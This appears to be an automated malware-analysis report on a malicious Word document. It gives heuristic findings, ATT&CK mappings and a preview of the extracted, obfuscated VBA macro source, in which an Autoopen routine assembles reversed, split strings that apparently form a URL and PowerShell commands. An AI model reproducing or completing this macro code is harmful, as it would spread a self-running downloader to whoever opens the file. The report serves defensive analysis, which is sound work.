MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing VBA macros. The critical heuristic firing indicates the presence of a Shell() call within the VBA code, which is commonly used to execute arbitrary commands or download and run additional payloads. The AutoOpen macro further suggests an attempt at immediate execution upon opening the document. The obfuscated nature of the VBA code prevents a more detailed analysis of its specific actions.
Heuristics 5
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 118087 bytes |
SHA-256: 36bd199c6b429ed4d5494b53cdc82f90d6495a84b8223f71dc6a88e44a0b27c2 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "qIsjsUf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub GzZBl(wLBst)
GormpC = RPAUdW
tHWHqD = dKppzT
URRSod = KzTNwS + Sgn(77525 - FdviK - ppuCp + Fix(87227)) - 55766 - CDbl(58107)
wpiMw = 95569
End Sub
Sub BpsfjJ(urlzV)
MuVJL = cXQzkT
vWYPFr = WbGli
jnzKDt = ZpCTY + Sgn(476 - VLlpI - CNfWb + Fix(61625)) - 15119 - CDbl(21753)
knjiYz = 78759
FwqLG = UEqFa
LqQdTk = HdjXm
rFOjtb = jnjtR + Sgn(237 - HLRlah - WuXGL + Fix(78413)) - 62716 - CDbl(64386)
WYEPPA = 10698
wiIIY = WLSoL
MwwEZV = qdiml
tKUNkh = FwowZ + Sgn(28090 - jBvsAV - hYcAqt + Fix(80045)) - 28236 - CDbl(83708)
rXIfA = 2860
End Sub
Sub iHEqPJ(fKXbp)
plQNLl = NunQrF
EBFSj = zKtQvS
bUfWO = JZFGu + Sgn(38943 - IkoTo - KkwdEF + Fix(84367)) - 79666 - CDbl(70500)
szSsXR = 85701
RCRvA = uKwVrM
ZcwIi = raRWjZ
NHcbqr = aClhOk + Sgn(96320 - uGWwYJ - XWktl + Fix(2659)) - 76846 - CDbl(487)
iWFkni = 43703
End Sub
Sub Autoopen()
On Error Resume Next
zTvXqO = thIjKz
AlvjFr = FqmCFz
iNuLks = ENuhHq + Sgn(99597 - sHqjw - UpEdf + Fix(64052)) - 87055 - CDbl(55549)
VlPCP = 37777
sOBlwwww (UaHmw + AHmRQqZDIRTn + ACzAz)
wiMYC = KYpiE
FbEZv = nklimP
KZwoC = ijsiiJ + Sgn(24836 - jEvYm - wjUTb + Fix(12275)) - 10129 - CDbl(24892)
PTrwz = 85758
End Sub
Sub OjnDZa(zZPif)
jpGAu = dFcMwa
XcKnN = UlqMk
vVSXuM = ZFjaN + Sgn(83450 - WPqlW - dHDlmm + Fix(3798)) - 40930 - CDbl(21650)
qdVRw = 13411
iiAYA = rBzvL
FuEptG = RhkIKC
jqwsa = PEHDW + Sgn(36029 - vMjpqq - GblobL + Fix(20222)) - 78838 - CDbl(56170)
aqWlcA = 10088
VIaAm = TadsF
vRTXII = IQOsa
KdfwqT = ikUiD + Sgn(10376 - kVBhSj - BIWwdT + Fix(93339)) - 94033 - CDbl(77919)
PAZcY = 75676
End Sub
Sub mYtTKw(UDUUnP)
arvIUJ = NzPhwO
DfLLh = vtpMr
kiazc = ZZpId + Sgn(37975 - djZYi - OiTQXI + Fix(15901)) - 10655 - CDbl(85306)
jBjRIZ = 37486
End Sub
Attribute VB_Name = "AmXWpduCsHEq"
Sub VLacd(NDrUE)
nIHtCv = MmYrO
tpVUQA = BQLqJ
iIFjIS = pBVnI + Sgn(80668 - zdjwT - kkbri + Fix(51433)) - 38116 - CDbl(4924)
WzRjMQ = 92658
End Sub
Function AHmRQqZDIRTn()
On Error Resume Next
DPZuC = UiLanB
hPWzF = jNAiwR
fYVYd = DWjjuR + Sgn(65127 - GJWAjA - phumH + Fix(42649)) - 29507 - CDbl(87767)
hadrM = 93196
MvYsTi = jdPKZ
LWMvR = ibFdjz
nASUS = NSPRHj + Sgn(64632 - YZjsR - zGGEL + Fix(74897)) - 81778 - CDbl(63552)
GSrvL = 82842
IFBwIFzDm = mjTjPa("5QqZz:p'+'tth@/s5'+'5q'+'Jm/ed'+'.zlas-'+'vdejE", 24806 + 3 - 24806, 24806 + 40 - 24806)
QJwhM = vFEMkq
BYlOl = htOIj
jvIzPn = LOIXv + Sgn(70274 - AKBzzC - aVihdJ + Fix(5802)) - 19210 - CDbl(31654)
AQufD = 74763
XNaSj = jtTLGH
uqooEi = Dlpaj
wnCiT = PmWPT + Sgn(39741 - REZqmq - BtciJo + Fix(83178)) - 54867 - CDbl(7413)
YzjYtv = 81589
luNsJXMmMEW = mjTjPa("7I7]rAHc[+38]rAHc[( EcALPErc-)'}}{h'S2z,", 11607 + 5 - 11607, 11607 + 35 - 11607)
srstYa = UHQGd
DjlGFL = ViXmj
rUlYYJ = BuzFHV + Sgn(2620 - phbWa - VPzRnj + Fix(41246)) - 37186 - CDbl(26299)
FKojA = 67106
vPJKu = EQLWdC
pkZjR = jRNSJz
DDVXo = WfOLw + Sgn(42739 - TniOb - obDZAn + Fix(41667)) - 64132 - CDbl(37674)
hzzNVj = 2463
nipwBsDWP = mjTjPa("OBoc))93]rAHc[,)47]rAHc[+35]rAHc[+94]rAHc[(ecaLper-29]rAHc[,'fsoDADsc", 66983 + 6 - 66983, 66983 + 60 - 66983)
nhEfVa = dNLjt
zraIwA = UkTrCw
OwIlnm = atfJGd + Sgn(563 - aKBav - GZEXjW + Fix(52033)) - 6462 - CDbl(28614)
cYsKj = 8375
idYwj = qojWZ
cvHpD = VXEWGi
qPDBQA = nURXuc + Sgn(73920 - vzaRz - hNiKo + Fix(24788)) - 25823 - CDbl(51549)
IXqLp = 89647
FUuucaUiiu = mjTjPa("hF+'cta'+'c}'+';k'+'a'+'erb;)'+'C'+'DSAk4()'+'J51'+'me'+'tI-eJ51+J51kJ51+'+'J5'+'1ovnIJ51(&'+';)CDS'+'A'+'k4 ,'+')(DN'+'SgN5ZPi5'+'Z'+'PrtSoTDNS3%73", 49734 + 5 - 49734, 49734 + 142 - 49734)
nPVwjH = jvbzVb
vojbJ = VrcoP
CJAER = FILKwC + Sgn(53343 - iwPNN - zMMjHj + Fix(61883)) - 85966 - CDbl(32159)
nhhXFV = 68875
VzUnz = zJKuEp
dbXZFp = OOpjT
QOpQct = sYfSP + Sgn(52465 - QTBALR - ajtUb + Fix(62786)) - 18079 - CDbl(21600
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.